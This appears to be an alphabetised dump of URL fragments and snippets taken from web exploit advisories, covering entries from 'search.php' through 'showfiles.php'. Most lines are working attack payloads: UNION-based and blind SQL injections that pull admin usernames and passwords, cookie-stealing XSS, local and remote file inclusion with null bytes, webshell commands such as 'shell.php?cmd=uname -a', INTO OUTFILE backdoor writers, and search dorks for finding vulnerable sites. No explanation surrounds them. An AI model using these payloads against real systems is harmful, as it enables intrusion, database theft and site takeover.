search.php?rate=[sqli]
search.php?s=%27
search.php?sa=site&sk=a&nl=11&st=
search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);<
search.php?sa=site&sk=a&nl=11&st=XX' union select version()
search.php?search='
search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin
search.php?search=%3Cscript%3Ealert(document.domain);%3C
search.php?search=3&sex=1[SQL]
search.php?search=a%25%27%20order%20by%20time%20desc%3b%20[query]
search.php?search=a%27%20order%20by%20time%20desc%3b%20[query]
search.php -> 'search field' -> '"<
search.php -> 'search field' -> [sql injection]
search.php?searchfor="><script>alert('test');<
search.php?search="><script>alert(123);<
search.php?search=".,script.alert(document.cookie)<
search.php?searchstring=&by=[SQL]
search.php?search_text=1[SQLi]&search=Search
search.php?search=' UNION SELECT 0,0,0,0,username,	#
search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%2$
search.php?search=xd&match=`news_subject[SQL-Injection]
search.php?seed=640'
search.php?selected_search_arch=%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
search.php?selected_search_arch=><script>alert(document.cookie)<
search.php?server_id=0&search=true&filter=objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3Dexample%2Cdc%3Dcom&form=advanced&scope=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C
search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C
search.php?sess=your_session_id&lookfor=<script>alert
search.php?&sortby=dateline&sort=DESC&q=open&forums%5B[SQL]%5D
search.php?sourceFolder=[Evil> Script]
search.php?s=<script language="javascript">alert("");<
search.php?s=[sqli]
search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C
search.php?submit.x=0&submit.y=0&search_terms=[SQLi]
search.php?theme_dir=..
search.php?title=%22%3E%3Cscript%3Ealert(
search.php?toroot=http
search.php?user=%22%3E%3Cscript%3Ealert(
search.php?what=&where=articles
search.php?words=<script>alert(document.cookie);<
search.php?zoom_query=<script>alert("hello")<
search?p=$procura&ei=UTF-8&fl=0&all=1
search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=
search?q=%22ASP+Forum+v1.0+-+Powered+by+GO4I.NET++-%22+++inurl:forums.asp%3FiFor%3D&
search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.2%22
search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.3.1%22
search?q=%22powered+by+websvn+v1*%22
search?q=%22Segue+v.%22%2B%22Middlebury+College%22&hl=tr&start=0&sa=N
search?q=%22The+Merchant+Project%22&hl=tr&start=30&sa=N
search?q="Attempting+to+create+archive"+"wp-content
search?q=intext:%22Event+List+0.8+Alpha+by+schlu.net+%22&hl=tr&start=0&sa=N
search?q=intitle%3A%22CodeBreak+-+Hidden+Morse+Code">intitle:"CodeBreak - Hidden Morse Code"<
search?q=inurl:
search?q=inurl:func%3Dselectcat+%2B+com_remository&hl=tr&start=0&sa=N
search?q=inurl:index.php%3Foption%3Dcom_jombib&hl=tr&start=0&sa=N -->
search?q=inurl:index.php%3Foption%3Dcom_nicetalk&hl=tr&start=0&sa=N
search?q=inurl:wp-content
search?q=lello+splendor++&hl=it&lr=&start=
search?q=lionaneesh
search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1)
search?q=+myAlbum-P+2.0+++(original)&hl=tr&start=0&sa=N
search?q=Powered+by+dB+Masters%27+Curium+CMS+1&hl=tr&start=0&sa=N
search?q=Powered+by+ExoPHPDesk+v1.2+Final.+&hl=tr&start=0&sa=N
search?q=Powered+by+TeamCal+Pro&ie=utf-8&oe=utf-8&rls=org.mozilla:ar:official&client=firefox-a
search?q=test\' 
search?query=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C122%2C108%2C118%2C58%29%2C%28CASE%20WHEN%20%28EXISTS%28SELECT%209%20FROM%20information_schema.TABLES%29%29%20THEN%201%20ELSE%200%20END%29%2CCHAR%2858%2C113%2C103%2C116%2C58%29%29%2C%20NULL%2C%20NULL%23%20AND%20%28%27CTgy%27%3D%27CTgy
search?query=[SQL Injection]
search?q=VS-G%C3%A4stebuch+V.+%C2%A9&hl=tr&start=10&sa=N
searchReceiptsResponse?criteria=name&User=%25' UNION SELECT 1,2,3,4,5,6%23
searchReceiptsResponse?criteria=order&OrderNumber=-1' UNION SELECT 1,2,3,4,5,6%23
searchReceiptsResponse?Day=%25' UNION SELECT 1,2,3,4,5,6%23
searchReceiptsResponse?Month=%25' UNION SELECT 1,2,3,4,5,6%23
searchReceiptsResponse?Year=%25' UNION SELECT 1,2,3,4,5,6%23
searchrecipe.php?mode=1&title=<script>alert('hi');<
searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
searchrecipe.php?sstring=[SQLi]
search_result.php
search_result.php?cid=
search_result.php?cid=9999999+union+select+1
search_result.php?cid=[sql] 
search_result.php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--
search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
searchresult.php?sbcat_id=<SQL C0de>          #
searchresult.php?sbcat_id=[sql code]            #
search_result.php?search=url&haystack=[SQL]
search_result.php?Sex=male&LookingFor=female&DateOfBirth_start=18&DateOfBirth_end=40&Country%5B%5D=0UNION 
search_result.php?sid=CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3C
search_result.php?sid= CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD
 search_result.php?sid=&searchTopCategoryID=&searchQuery='SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD
search_results
search-results
search_results.php?browse=1'
search_results.php?browse=-1+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,version(),6,7,8,9--
search_results.php?cid=-1
SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='
SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27 
SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0
SearchResults.php?Match='&NewsMode=1&SearchNews=Search&CatID=0
searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName
search_results.php?query=<marquee><h1>come to dance! <br>by, 3spi0n<
search_results.php?query=<script>alert(0);<
search_results.php?query=<ScRiPt >prompt(931776)<
SearchResults.php?SearchTerm=&where=ItemName UNION
SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16
SearchResults.php?SearchTerm=ZoRLu&where=[SQL]
searchScreen?w="cms+SunLight+5.2"&mod=f
search?search=<
search.seznam.cz
/?search=|The:Paradox|%25%27
search_user.php
Search' . "\x0d\x0a" .
~seazon
sebug.net
sec
sec4ever.asp;.jpg
sec_consult
seclists.org
seclog.de
secpod.org
secret
secret.php
sec_stage_install.php?language=
sec_stage_install.php?whatlang=1&language=
/?section=
/?section=..
/?section=downloads&action=viewdl&id=12
/?section=downloads&show=viewdownload&id=14
/?section=downloads&show=viewdownload&id=24
sectionex
/?section=gallery&action=commentsedit&id=
/?section=gallery&action=comments&id=
/?section=gallery&action=commentsquote&id=
/?section=gallery&action=gallery&id=
/?section=gallery&action=kate&id=
/?section=gallery&action=viewpic&id=
section&get_action=article&section=5
/?SectionID=3&SearchText=[hostile_code]
/?section=[LFI]%00
section.php?id=1  (SQL)
section.php?Module_Text=CoBRa_21&ID=6&Lang=En&Nav=Section&Module= [LF&#304;]
section.php?name=singers&f=songs&singerid=-1+union+select+1,pwd,3,4,5,6+from+7addad_authors--
section.php?Nav=Section&ID=-1 union select 0,1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables--
section.php?section=9&topic=6+union+select+1,2,3,version(),5--
sections
sections) "allows you to create sections
sections.php?action=show&id=-1' UNION SELECT 1,2,3,4,5%23
/?section=user&action=details&func=stats&id=
/?section=user&action=details&id=
/?section=user&action=details&id=1
seculab.php';
seculab.php&action=writetofile&content=';
secunia_research
secure
SecureDocumentLibrary
secure.ntsg.umt.edu
secure.php?db_driver=..
secure.wikimedia.org
securimage
securite-informatique
security
Security
security_advisories
security-advisories
securityalert
SecurityAlertExecuteCommandsWithRev' ]
SecurityAlertExecuteCommandsWithSearch' ]
security-breach
security-bulletins
securitydb.org
Security#Dokeos_1.8
security-flaw-imagefilemanager
security.globals.php
security.html
security.inc.php?cmd=".urlencode($command)."&l=".urlencode("..
security.inshell.net
securitylab.ir
Securitylab.ir
Security Or wait a new
',{'security_password':'test1','security_type':'page','site_title':'ALERT.','site_template':'default','language_default':'en','meta_keywords':'CMSimple%2C+Content+Management+System%2C+php','meta_description':'CMSimple+is+a+simple+content+management+system+for+smart+maintainance+of+small+commercial+or+private+sites.+It+is+simple+-+small+-+smart%21','backup_numberoffiles':'5','images_maxsize':'150000','downloads_maxsize':'1000000','mailform_email':'','editor_height':'%28screen.availHeight%29-400','editor_external':'','menu_color':'000000','menu_highlightcolor':'808080','menu_levels':'3','menu_levelcatch':'10','menu_sdoc':'','menu_legal':'CMSimple+Legal+Notices','uri_seperator':'%3A','uri_length':'200','xhtml_endtags':'','xhtml_amp':'true','plugins_folder':'','functions_file':'functions.php','scripting_regexp':'%5C%23CMSimple+%28.*%3F%29%5C%23','form':'array','file':'config','action':'save'});
security.php
security.php?codigo=
security_release_-_cakephp_2_1_5_2_2_1
security_response
securityscan.php
securityshell
security-shell.ws
security-sql-injection-vulnerability-in-storyteller-cms.1148
security-team
security-testing-services.html 
securityupdates
security-vulnerability-fcms-2-5-2-7-1
secwatch
secwatch.org
s_edit.asp?email=[SQL]
seditor.php?
sedre.loria.fr
sed-team.be
seecommerce
[see-commerce directory]
Sefirot_r0x
segue
segue.middlebury.edu
seite.de 1
sekrit
sektioneins.de
sekuritionline.net
select
sELEcT
sELECt
Select
SeleCT
*!SelEct*
SELECt
SELECT
SELECT+1,
select+1,2,3,unhex(hex(group_CONCAT(username,0x3a,pwd))),5,6,7+from+users--
select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,concat%28LoginID,0x3a,password%29,38,39,40%20from%20admin
select%200,aid,0,pwd,0,0%20from%20nuke_authors 
SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1-- 
SelECt%201,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4--
SELECT%20pass%20from%20spip_auteurs
select_category.php?
select_group.php?foobar="><script>alert(123);<
select.html?dir=
SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}";
select_image.php?dir=..
select_image.php?dir=$param");
selectlang.php?BBC_LANGUAGE_PATH=[Bad Code]
 (Select Mirrors 2 upload file and select file 2 upload)
SELECT><?php system($command);include($remote_script)?> 
select><script>alert(123);<
 select ".$sex->charEncode("<?php").",'".$backdoor_installer."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '
 select ".$sex->charEncode("<?php").",'".$backdoor."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '".$remote_path."'-- 1");
 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES'\n");
 'SELECT user()'
select_user.php?gfplugins=[Shell]
self
selfserv
selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=customer_change_pkg;
selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=view_usage_details;svcnum=598;
"+self.target+self.path+"
sellatsite
sellers_othersitem.php?seller_id=1 << and 1=0
selloffers.php?cid=-14+union+select+1,version%28%29,3,4,5,6,7,8--
selloffers.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+b2b_admin--	
selloffers.php?cid=[SQL]
sell.php :)
sell.php#goto
 (sell script )
 (sell script)
sem
seminar.vollmar.ws
send
sendcard.php?form=
sendcard_setup.php
send-email.php?email_name=test&email_from=test@test.com&email_to=test@exemple.com&email_subject=test&email_message=test
send_email_users.php"
sendfile.php?filelocation=config.inc.php
send get requests.
send http packet
sendit
sendletter.php" method="POST">
sendmail.inc (settings.inc and etc.) 
sendmail.php',
sendMail.php">
sendmail.php?action=quote&id=-1 UNION ALL SELECT @@version,2,3
sendmessage.php?do=mailmember&u = (your id) and get a cookie on our address sniffer.
sendmsg.php?phpbb_root_path=[Evil_Script>:]
sendpage.htm') AND
sendpage.htm') AND 1=0
sendpage.htm') AND 1=1
sendpage.htm&key=-1 OR 1=1 -> "Sie m?chten die Seite Homepage (de) versenden."
sendpage.htm&key=-1 OR 1=2 -> "Sie m?chten die Seite versenden."
sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 
sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97
sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115
sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121
send_pending_items_mail.php?gfwww=[Shell]
sendphoto.php?album=..&pic=config.inc.php
sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1 
send.php?dlid=127
send.php?load=..
send.php?load=[Local File]%00
sendpm.php?to=[username]&subj=[doesntmatter]&num=1&orig=
sendstudio
[senot]
seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie);
seo4smf-redirect.php?t=-1 union select 1,2,3…(numero de columnas)…,concat(username(),database()) –
seo4smf-redirect.php?t=[number 1 to total topics].new
seojobs
seopanel
seotoaster
seo_url&category_id=1&path=[LFI]%00
seo_url&product_id=[LFI]%00
seo-vbulletin
separate-comments-mod
seportal.org
september
seq
*&Sequence_Check=&Lang=en&Resolution=1280&Room=prova 
ser
serendipity
serendipity_admin_image_selector.php?serendipity[textarea]='"<
serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1' OR SLEEP(10)=0 LIMIT 1--+
sermon-browser
sermon-browser ]
/?sermon_id=-1+union+select+version(),2--
sermon.php
serv_cms.php
".$serv.$dir."ucp.php?id=2&user=".$login." HTTP
serve
server
<server>
".$server;
[server
[server]
{server
$server
server]
<serveR>
<Server>
SERVER
[SERVER]
server:2082
server:3306    <= download the file , save and open with c++ or wordpad will show mysql version
server:3306 result : 5.0.92-community (use versi 5.0.92) :D
server',"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
server',"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
$server_addr:$server_port
serverattacker
serverbilling
[SERVER].[COM]
server">Credit is appreciated.<
server_databases.php?lang=en-iso-8859-1&server=1&sort_by=db_name&sort_order="><script>alert(document.cookie)<
server_databases.php?lang=en-iso-8859-1&server=1&sort_by="><script>alert(document.cookie)<
".$server.$dir."
".$server.$dir.$filename;
".$server.$dir.$filename."?";
".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q); 
".$server.$dir."user
 server.domain_name
server.domain_name
$server${folder}profile.php?section=admin&id=$user_uid\n";
serverfree.org
serverhelpdesk
SERVER_Hostname
{$_SERVER['HTTP_HOST']}")); 
".$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF'])."
") . $_SERVER['HTTP_HOST'] . $folder)));
" . $_SERVER["HTTP_HOST"] .  $_SERVER["REQUEST_URI"];
server.inc.php?go_info[isp][classes_root]=[cmd_url]
server-ip
SERVER.IP
ServerIp:2083
<Serverip:port>
serverisdown.org
serverisdown.org ]
servername
server.net">put_code<
servernuke
server[path]
server.php?bhconfig[bhfilepath]=attacker
server.php?get[status]=[EV!L]
server.php?sql=[sql]
[Server]:[Port]
serverscripts
".$_SERVER['SERVER_NAME'].dirname($_SERVER['PHP_SELF'])."|",$_SERVER['HTTP_REFERER'])) {
/?_SERVER[]=&_SERVER[REMOTE_ADDR]=<script>alert(document.cookie)<
ServersPage.class.php?base_path=[evil_scripts]
server.tld
server-victim
Server-Victim
server-victim:80
service
service.class.php?path_om=[Shell]
service.php?ID=-1211+
service.php?ID=-1211+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20-
/?service=prodotti_dettaglio&idpro=4
services
ServicesHostingServicesPage.class.php?base_path=[evil_scripts]
ServicesNewHostingPage.class.php?base_path=[evil_scripts]
ServicesPage.class.php?base_path=[evil_scripts]
services.php?id=-34%20union%20select%201,2,concat%28login,0x3a,password%29,4,5,6+from+login_table+where%20login_id=1
ServicesWebHostingPage.class.php?base_path=[evil_scripts]
servlet
*",$serv,$path);   
".$serv.$path."index.php\r\n";
serweb
session
 --session=22ead72ecf6af376a801923466a23efa\n";
session.inc.php?go_info[server][classes_root]=
session.php?baseDir=[REMOTE INCLUDE]
session.php?gfcommon=[Shell]
sessions
/?session=[session_key]&infile=[LFI]
sessions.php?globalIncludeFilePath=[LFI]%00
/?_SESSION[user_language]=[etc
.sess_\",\"w\");fwrite($a,$
set-author.php?GLOBALS[g_campsiteDir]=[SHELL]
setcms
Set-Cookie: (.*);
Set-Cookie: ([^;]*);
Set-Cookie: (.+); path=
Set-Cookie: (phpicalendar_[^=]*)=
setcookie.php?u=..
set_entry_cat.php?gfplugins=[Shell]
setiathome.ssl.berkeley.edu
seti.php?ps_cfg_langfiles= [inj3ct0r sh3ll]
seti.php?ps_cfg_langfiles= [LFI]%00
/?setLang=[SQL] 
/?set_lng=..
setLogin
set_option?accesspwd=NEWPASSWORD
set_option?accessuser=NEWUSER
set_prefs.php?cid=?=&p_course=[INJECTION]&h=&expand=&oid=&id=&submit_language=&st=&name=[INJECTION]&value=[INJECTION]
sets
setting
setting" method="post" name="main">
settings
settings 
settings--
SettingsBase.php?Skin=ATK
SettingsBase.php?Skin=[code]
settings.cdb
settings.cfg&Move_x=1&originalfolder=c:
settings_company.php" script via http POST method.
settings-config
settings.db
settings.html.
settings.html?id=[current_id]&Save_x=1&language=TEST 
settings HTTP
settings.inc.php
settings.inc.php?include_path=[darkcode]			[»]
settings_menu.php" method="post" enctype="multipart
settings_network_scan.php
settings_network_scan.php?ID=2+[SQL-INJECTION!]--%20-
SettingsPage.class.php?base_path=[evil_scripts]
settings.php
Settings.php 
settings.php3?BSX_LIBDIR=<br>"
settings.php?action=validate" method="post" name="main">
settings.php?current_user_id=[SHeLL]
settings.php?inc_dir=[evil_script]
settings.php?message=<script>alert(document.cookie);<
settings.php" method="post">
settings.php" method="POST">
settings.php" method="post" class="niceform" name="frmname" enctype="multipart
settings.php?mosConfig_absolute_path=[evilcode]
settings.php?pfad_z=[Shell]
settings.php\r\n";
settings.php?sample=>
settings.php?sample='><
settings_siteinfo.php" script via http POST method.
settings_theme.php?message=<script>alert(document.cookie);<
settings?token=true&report=<
settings?token=true&report=<script>alert("test")<
setup
setup-config.php?step=1
setup-config.php?step=2
SetupController.php?baseDir=[evilcode]
setup-network.php
setup.php
setup.php";
setup.php?cmd=ls%20-la&localeset=..
setup.php?do=settings
setup.php?localeset=..
setup.php?notebook=<script>alert(0)<
setup.php?op=language&lang=1
setup.php Or www.site.com 
setup.php?site=%27;alert%28String.fromCharCode%2888,83,83%29%29
setup.php?site=%3Cscript%3Ealert(0)%3C
setup.php?step='
setup-relay.php
setupUrl>
setuser.php">
/?s=events HTTP
sever
sezhoo
SezHooTabsAndActions.php?IP=Sh3lLz?
sf
sfbrowser
sfbrowser.php
sfbrowser.php");
sf-forum?forum=[exploit]
sfiab
..%s" % FILEPATH)
sflog
s_free_dating_system.htm
&sfx=
SG
sh>
sh3ll
sh3LL?
Sh3LL?
SH3LL?
Sh3llScript?
shaadi
shaadiclone-v2.0-2.html ]
shaadi_zone_1.0.9
shadow 
shadow ;)
shadow%00
shadowsrising
shall
share
sharecms
[sharecms_path]
shared
sharedaddy.php
shared_scripts
share_name
share-zone-the-file-sharing-software.html
sh_dir
shell
 || $shell =~ 
 -shell
".$shell."?";
[shell]
[shell]?
[shell]? 
shell 
shell \ 
shell?
shell*
[Shell]
[Shell] 
[Shell]      ##
Shell   #####
Shell?
shell4u.oni.cc
shell4u.tk
shell.asp
".$shell."?cmd=".$nix.'%00';
[ShellCode]
shell_create__command_execution_in_jaf_cms.html
shell.dat?
 ' + shell + '?>\');fclose($fp); ?>'}
shell.gif cmd
shell.gif \r\n";
shell.html (or) .htm
^shell=http:\
shell.inc%00
shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][
shell location
  shell name
$shell_name)\n\n");
shell.org
shell.own3r.by.ru
shellpathownmeinph","")
" + shell_payload)
[ shell.php ]
[shell.php].
shell.php
shell.php<
shell.php 
shell.php ?
shell.php?
shell.php? 
shell.php'
shell.php';
shell.php"
shell.php";
shell.php");
 [Shell.php]
Shell.php
Shell.php?
[SHELL.php]
*****SHELL*****_.php
SHELL.PHP
shell.php.00
shell.php.001
shell.php1
shell.php'%20FROM%20chat_text
shell.php'%20FROM%20pp_config
shell.php';%23
shell.php'%23
shell.php';%23&term=
shell.php5?cmd=ls%20-la
shell.php?cmd=[commands]
shell.php?cmd=[commands]\n\n", argv[1], argv[2]);
shell.php?cmd=dir
shell.php?cmd=ls 
shell.php?cmd=ls [+] Execute the websehll script  
shell.php?cmd=ls [+] Execute the websehll script  \n", zb_host, zb_dir);
shell.php?cmd=pwd%00
shell.php?cmd=uname -a
shell.php?cpc=ls to see results";
shell.php - evil php code script
shell.php.flac
shell_php.gif
shell.php.gif
shell.php HTTP
shell.php is generated!
shell.php is generated!\n 
shell.php is generated!\n [+] Exploiting success!!\n", zb_host, zb_dir);
shell.php.jpg
shell.php.jpg?cmd=id
shell.php' . "\n";
shell.php)\n";
shell.php\n";
shell.php.pbmp
shell.php.pgif
shell.php.pjpeg
shell.php.sisx
Shell.php    ( will view the shell )
shell.pl;chmod 777
shell.pl;chmod 777 shell.pl;perl shell.pl%0a");
shell.ptxt
shells
[shellscript]
[Shellscript]
 Shell Script
shell         <<<<  Shell (Text File)
 || $shellsite!~
shell.tmp???]
 Shell Tryag-Team
SHELLURL?
SHELLURL.COM
SHELLURL.COM?
SHELLURL.COM?&cmd=id
shell_vup.php?cmd=$cmd");
shell.x
sheLLz?
Shellz?
shelz
sherpa.tgz
">Shichemt-Alen  2010<
".shift;
shipping
shipping.php?include_modules[i][file]=[EV!L]
shockwave
shop
[shop]
shop>
shop): ";
Shop
shopadmin
shop_by_brand.php?cat_manufacturer=[query]
shopcart
Shopcart
shopcartdx1
ShopcartDX-1-1421.html
shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
shop.class.php?system_path=[evil_scripts]
shop_display_products.php?cat_id=' 
shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer
shop.htm?cid=31+and+1=1
shop.htm?cid=31+and+1=100
shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
shop.htm?cid=[id]+and+1=100  false
shop.htm?cid=[id]+and+1=1    true
shop.htm?cid=[SQLi]
shop.htm?shopMGID=131>  =="
shop.htm?shopMGID=9999'
shop.htm?shopMGID=9999+order+by+1--
shop.htm?shopMGID=-9999+union+select+1,2,3,4,5--
shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5+from+information_schema.columns--
shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5+from+information_schema.columns+limit+0,1--
shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,username,password),4,5+user--
shop.htm?shopMGID=-9999+union+select+version(),database(),3,4,5+from+information_schema.columns--
shop.htm?shopMGID=XXXX (see below python exploit)
shop.igeneric.co.uk
shop-inet.ru
shop.maker.ir
{Shop path}
shop.php
shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
shop.php?cat=[query]
shop.php?cat=[SQL]
shop.php?cid=[SQLi]
shop.php?id=1 << and 1=0
shop.php?pid=[SQL Injection]
shop.php?storeid=77 and 1=1
shop.php?storeid=77 and 1=2
shopping
shoppingcart
shopping-cart
shopping_cart_demo.php
shopping_cart.php?_ID=..
Shopping-Carts
shopping-cart-source-code.php
shopsystem
short
shorturl
short_url.php
shorturl.php
short_urls.php
%s", $host); # CRAP CRAP CRAP
shoutbox
shoutbox_admin.php?
shoutboxarchive.php?lookforcount=waraxe=1%23
shoutbox_panel
shoutbox.php?conf=..
shoutBox.php?path[cb]=[cmd_url]
shoutbox.php?phpbb_root_path=
shoutcastadmin
shoutpro
ShoutPro1.5.2
show
show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile--
show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--
show_activity.php?id=<script>alert(document.cookie)<
show_archives.php?archive=[code]&subaction=list-archive&
show_archives.php?subaction=showcomments&id=<script>alert(document.cookie);<
show_archives.php?template=
show_archives.php?template=..
Show_archiv.php?id=-1
showarticle.php?aID=-4+union+select+version(),2,3--
showblog.php?plugin=..
showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1
show_bug.cgi?id=179
show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile--
show_captcha.php?sid=".$img."&username=";
showcase
show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,password)+from+admin
showcategory.php?cid=-1
showcategory.php?cid=-101+union+select+1,@@version,3,4,5--
showcategory.php?cid=-1%20union%20select%201,concat(id,0x3a,admin_name,0x3a,pwd),3,4,5,6%20from%20sbwmd_admin--
showcategory.php?cid=-24
showcategory.php?cid=-264+union+select+1,concat(user
show_category.php?Id=-2
showcategory.php?type=6&cid=-1+union+select+1,unhex(hex(concat(admin_name,0x3e,pwd))),3,4,5+from+freetplbanners_admin--
show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login 
showcat.php?catid=<Script>JavaScript:alert('test');<
showcat.php?cat=[query]
showcat.php?forumid=-1%20union%20select%20ModName%20from%20modretor
showcat.php?forumid=-1%20union%20select%20ModPassword%20from%20modretor
showcat.php?forumid=1&Page=-1[SQL])
showcats.php?sbcat_id=1+union+select+1,
ShowCenter
showcode.php
showCode.php?path=;uname -a
show_content.php?id=LFİ %00
showContent.php?linkid=5'
showContent.php?linkid=-5+union+select+all+version()--
showCustom.do?resourcename=null&type=EC2Instance&original_type=EC2Instance&name=&moname=i-
showdetails.php?contentname='
showdiarydetail.php?rootdp=DSecRG&admin_home=..
showdiarydetail.php?rootdp=DSecRG&gsLanguage=..
showdiarydetail.php?rootdp=DSecRG&language_home=..
showdiary.php?rootdp=DSecRG&gsLanguage=..
showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=..
showdownload-3105.html
showfile.html?dir=
showfile.php  
show_file.php?file=..
showfiles.php?group_id=100272
showfiles.php?group_id=100875&package_id=108474&release_id=221732
showfiles.php?group_id=101364 
showfiles.php?group_id=103303&package_id=110862&release_id=243512
showfiles.php?group_id=105885
showfiles.php?group_id=107225&package_id=178479&release_id=635701
showfiles.php?group_id=110199
showfiles.php?group_id=110366
showfiles.php?group_id=111506
showfiles.php?group_id=111881
showfiles.php?group_id=112452&package_id=141123&release_id=297459
showfiles.php?group_id=113192
showfiles.php?group_id=113755
showfiles.php?group_id=114129]
showfiles.php?group_id=116966&package_id=152150&release_id=326884
showfiles.php?group_id=118575&package_id=129141&release_id=519061
showfiles.php?group_id=118780
showfiles.php?group_id=120703
showfiles.php?group_id=121246
showfiles.php?group_id=121558&package_id=290027
showfiles.php?group_id=125710]
showfiles.php?group_id=126659 
showfiles.php?group_id=129562
showfiles.php?group_id=131995  
